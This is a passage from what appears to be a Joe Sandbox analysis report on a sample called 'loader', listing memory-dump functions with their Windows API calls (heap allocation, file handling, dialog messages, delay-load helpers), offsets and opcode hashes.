              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AllocateHeap_free
              • String ID:
              • API String ID: 614378929-0
              • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
              • Instruction ID: 08f97818d12be9f852ae6283e30bc060ac294730b8874d5e3e12676558df0f37
              • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
              • Instruction Fuzzy Hash: C101F9726043596BE3318F65E88595AFBE9FB95370F25055DF59483280EB30A805C774
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction ID: 5c6e43ad75b988a299a52ebf22d4b822f02d61b4fdaa0902c8e66efb742c356b
              • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction Fuzzy Hash: 4CF03C31A14709DFDB34DA65C945656B7E8EF25330F608A1AE4DAC76D0E7B0D880C792
              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00128FD3,00000001,00000364,?,00123713,00000050,?,00140EE8,00000200), ref: 001285EA
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: b0b1266afafa622c56c8cc61ae5ded980b55d84ef7fdc363d0b1ee50906c456c
              • Instruction ID: 3dca6d1862bd1658794210f04856af97f900cb6abcde30bb0ee6418c25cf296a
              • Opcode Fuzzy Hash: b0b1266afafa622c56c8cc61ae5ded980b55d84ef7fdc363d0b1ee50906c456c
              • Instruction Fuzzy Hash: 26F0E9316471316BDB255E26BC01B5B77C8AF917B0B19C111E819E60C1CF30DD318AE4
              APIs
              • __EH_prolog.LIBCMT ref: 00105BDC
                • Part of subcall function 0010B07D: __EH_prolog.LIBCMT ref: 0010B082
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: fd76b50ed5dba5312d2f1999e4c867907ed83730a32c3416340dff34fc230a93
              • Instruction ID: d933d61d9607a03cdf9816f23c215eb56ed47a50a2dbafebfaf9ce39c27b4022
              • Opcode Fuzzy Hash: fd76b50ed5dba5312d2f1999e4c867907ed83730a32c3416340dff34fc230a93
              • Instruction Fuzzy Hash: 3A016D30A15684DAC725F7A4C0567DEFBE49F69700F40459EA89E532C3CBF41B0AC762
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 7eeb0ec7819440e2c477a40a43ec5991582a20ea8c768be924e3401fcaed29ef
              • Instruction ID: 0e822f74ce30d17e46469071e67835a661bbb5d97be947685b715ae21c9db9bb
              • Opcode Fuzzy Hash: 7eeb0ec7819440e2c477a40a43ec5991582a20ea8c768be924e3401fcaed29ef
              • Instruction Fuzzy Hash: BBE0E5216431315AEB312A69BC00B5B7BCCDF513B0F150210EC14E2081CF64CC7085F5
              APIs
              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0010A4F5
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CloseFind
              • String ID:
              • API String ID: 1863332320-0
              • Opcode ID: b448a999aa773e6f0fe9661f200f6922c85f767b05c097c54743b174ea2fe55a
              • Instruction ID: 77daaef238262c20b0c3e436f5809c63738221f3da1f528b9542906494ce3fd8
              • Opcode Fuzzy Hash: b448a999aa773e6f0fe9661f200f6922c85f767b05c097c54743b174ea2fe55a
              • Instruction Fuzzy Hash: 17F0E935008380AACA225B7848047C77B94AF26371F04CA09F1FD421D1C3F414C59723
              APIs
              • SetThreadExecutionState.KERNEL32(00000001), ref: 001106B1
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ExecutionStateThread
              • String ID:
              • API String ID: 2211380416-0
              • Opcode ID: 30cac51f398bf293659f5faf164af4ee342222b144fb050e3d896d161f980cf0
              • Instruction ID: bbee3b07f375d96bb65813651b4be51579efd4295cd606cc5c398369c81ac4c8
              • Opcode Fuzzy Hash: 30cac51f398bf293659f5faf164af4ee342222b144fb050e3d896d161f980cf0
              • Instruction Fuzzy Hash: 57D02B346101103EC62F3325E8057FE1A060FCB720F080031B65D139D78BD708CA82F2
              APIs
              • GdipAlloc.GDIPLUS(00000010), ref: 00119D81
                • Part of subcall function 00119B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00119B30
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Gdip$AllocBitmapCreateFromStream
              • String ID:
              • API String ID: 1915507550-0
              • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction ID: b1369db7bb349269a452f854a402b88a64f76c97600f5374e564495f7bab19f3
              • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction Fuzzy Hash: 04D0A73061820C7ADF48BBF09C229FA7BA9DB10300F004035BC1886141FF71DE90A261
              APIs
              • GetFileType.KERNELBASE(000000FF,00109887), ref: 00109995
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 0180c38c8c0b94184666aeebfee18e5cccd08fbe74ede89b642c98bae7a6fb3e
              • Instruction ID: 8d97a343fddb69041262b5b010272cf156abba155fb317a914767522fa83dd89
              • Opcode Fuzzy Hash: 0180c38c8c0b94184666aeebfee18e5cccd08fbe74ede89b642c98bae7a6fb3e
              • Instruction Fuzzy Hash: BBD01231111141A5CF2546384D1909A7751DB8337EB38C6A8E0B5C40E2D767C843F581
              APIs
              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0011D43F
                • Part of subcall function 0011AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0011AC85
                • Part of subcall function 0011AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011AC96
                • Part of subcall function 0011AC74: IsDialogMessageW.USER32(0001040A,?), ref: 0011ACAA
                • Part of subcall function 0011AC74: TranslateMessage.USER32(?), ref: 0011ACB8
                • Part of subcall function 0011AC74: DispatchMessageW.USER32(?), ref: 0011ACC2
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Message$DialogDispatchItemPeekSendTranslate
              • String ID:
              • API String ID: 897784432-0
              • Opcode ID: 792e3e1b7c3635865e5e5abdb8ebe2f5cec299772bc67f1fb5e6876336cc9eb4
              • Instruction ID: 496cfe07c337e79d3a7fdc18bd5b2cab0d5e9fd0ce21154c9c28e377e10edd1a
              • Opcode Fuzzy Hash: 792e3e1b7c3635865e5e5abdb8ebe2f5cec299772bc67f1fb5e6876336cc9eb4
              • Instruction Fuzzy Hash: 12D09E31144300ABD6152B51CE07F0F7EA6AB99B04F404954B344754F286B29D61AB16
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b7d29f271e36516334730b06ad0eb2475ccbab2801ef227c91ef26276e61964f
              • Instruction ID: bbd9132cf1c326714e567f613ed7977496678de68e6b2919ae573810b3bbb88e
              • Opcode Fuzzy Hash: b7d29f271e36516334730b06ad0eb2475ccbab2801ef227c91ef26276e61964f
              • Instruction Fuzzy Hash: 84B0129526C7027DB50C21407D92C7B020CC4C3B10371453AF10AF00C0F7505CCA4431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c874270200b10f3be45c936b37f3e2c55d4e4090533a6f3797d541ab0ac2a737
              • Instruction ID: e4a67acee12ca2117b932ac27257afdbe72fe5e1f37dc0ced96db79cdae83bfc
              • Opcode Fuzzy Hash: c874270200b10f3be45c936b37f3e2c55d4e4090533a6f3797d541ab0ac2a737
              • Instruction Fuzzy Hash: 62B012D126C4026CB10C61447D42D76020CC4C3B10370C03AF50AF01C0F7505C8B0431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: fe899982adefd502aa5ca734d2d450a6d0057fb8b252f83233a80db832f9ecba
              • Instruction ID: 49fb64212b426374a21316c31e2804871051d3051758492811ca1708069d60d3
              • Opcode Fuzzy Hash: fe899982adefd502aa5ca734d2d450a6d0057fb8b252f83233a80db832f9ecba
              • Instruction Fuzzy Hash: 7EB0129526C5026CB10C61447D82D7B020CD4C2B10370403AF10AE00C0F7505C860531
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 889bd565d5a8d92320ea464ecd90e842be1bc9790646b1e1209902e3b3536fc6
              • Instruction ID: 63c56e8964bb1f64ed8f8e51c667d5066bd80471bcb47a378658d09c925892a7
              • Opcode Fuzzy Hash: 889bd565d5a8d92320ea464ecd90e842be1bc9790646b1e1209902e3b3536fc6
              • Instruction Fuzzy Hash: 7EB012A126D4026CB10C61447D42D76020CC4C3B10370803AF50EE00C0F7505D8A0431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 08ffe26a3ae03bf0fa5df9626e1b5276e20c17969afab6c9a14a0fb1a22bc55d
              • Instruction ID: 3b1ffc7717c49c2250487e429af8602fb1e15743b9cfdc1152ca779384ff2a2d
              • Opcode Fuzzy Hash: 08ffe26a3ae03bf0fa5df9626e1b5276e20c17969afab6c9a14a0fb1a22bc55d
              • Instruction Fuzzy Hash: 43B012D127C5026DB14C61447D42D76020CC4C2B10371813AF10AF01C0F7505CCB0431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: cb090a27360dae40ce75d8a386a1ddac053423caa978422371c38a455048c3a7
              • Instruction ID: 56980e7c4e194d1b75b08736b0e6e1960fdec14092348832725fa29617377ba7
              • Opcode Fuzzy Hash: cb090a27360dae40ce75d8a386a1ddac053423caa978422371c38a455048c3a7
              • Instruction Fuzzy Hash: 9AB012D126C4026CB10C61447E42D76020CC4C2B10370803AF10AF01C0F7605D9F0431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a866979ec95abd67cb9e9f14eb3165fa83fe422ac68a12e3b0dc0b1f2e9c0414
              • Instruction ID: a95287b94676043d0e3fae8f9e75338c8aa0ec3528f9753ed306e9d2dfdd8c5e
              • Opcode Fuzzy Hash: a866979ec95abd67cb9e9f14eb3165fa83fe422ac68a12e3b0dc0b1f2e9c0414
              • Instruction Fuzzy Hash: E0B012A126D4026CB10C61447E42D76020CC4C2B10370403AF10EE00C0F7505E870431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a44e0c7292f4ecf35d5faab29a497de455e68f0daa820522266d95e1b4095291
              • Instruction ID: 5c1c408f5869216634f58dde70ce75e5c24aded34470ad1e2d7aca78dd194c46
              • Opcode Fuzzy Hash: a44e0c7292f4ecf35d5faab29a497de455e68f0daa820522266d95e1b4095291
              • Instruction Fuzzy Hash: 63B012A126D4026CB10C61457D42D76020CC4D2B10370403AF10EE00C0F7505D860431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 007d86bd9bcad09d3c377884b05229a885af827ecda6c38bdafd6f3a14972bbd
              • Instruction ID: 45174d6113de3a17e572d4c61b8d43f5133df0d50b6e4ee3d2a675f499849b9d
              • Opcode Fuzzy Hash: 007d86bd9bcad09d3c377884b05229a885af827ecda6c38bdafd6f3a14972bbd
              • Instruction Fuzzy Hash: 1CB012A126D5026DB14C61447D42D76020CC4C2B10371413AF10EE00C0F7505DC60431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 93353cba60f8f6b192382259fe03a3371d0845dc74c5ef8e64e0a95e7ec35c3b
              • Instruction ID: f5641a7b956049978945a733bd1d01f5f46ca8618a46f06f1888dcf78803a5f9
              • Opcode Fuzzy Hash: 93353cba60f8f6b192382259fe03a3371d0845dc74c5ef8e64e0a95e7ec35c3b
              • Instruction Fuzzy Hash: 2AB012A126D5026DB14C62447D42D76020DC5C2B10771413AF10AE00C0F7505CC60431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a2c58f0e17cd27d7935200ff80f2168721d6eb2d4d28049de778d686992a6621
              • Instruction ID: e21b08731cfc0dc7f15aeb92489debb998052dd7d03bbc4f251116f3116dd09a
              • Opcode Fuzzy Hash: a2c58f0e17cd27d7935200ff80f2168721d6eb2d4d28049de778d686992a6621
              • Instruction Fuzzy Hash: 30B0129126D4026CB10C61447D42D76020DC5C3B10770803AF50AE00C0F7505C860431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ae5148b0b91959195fdf4423cbd7cb87129d50bb9ade18f70ee6f12db2b6d06b
              • Instruction ID: b2ac505b363af2e7e474d09843f71c8108ea756297120d13480fc36f07741f76
              • Opcode Fuzzy Hash: ae5148b0b91959195fdf4423cbd7cb87129d50bb9ade18f70ee6f12db2b6d06b
              • Instruction Fuzzy Hash: 60B0129127D4026CB10C61447D42D76024DC9C2B10770403AF10AE00C0F7505C860431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c9dc0ed3ab8abc09299135d0c7026b9398d6a7a45b0fec392068723bc2b2e96d
              • Instruction ID: 1a446b33f25b9f9b3ea34da22e904333ebad005dd647faa07a900b337e330077
              • Opcode Fuzzy Hash: c9dc0ed3ab8abc09299135d0c7026b9398d6a7a45b0fec392068723bc2b2e96d
              • Instruction Fuzzy Hash: B3B012D126D4026CB10C61547D42D76024CC4C3B10371C03AF60AE00C0F7509CC60431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
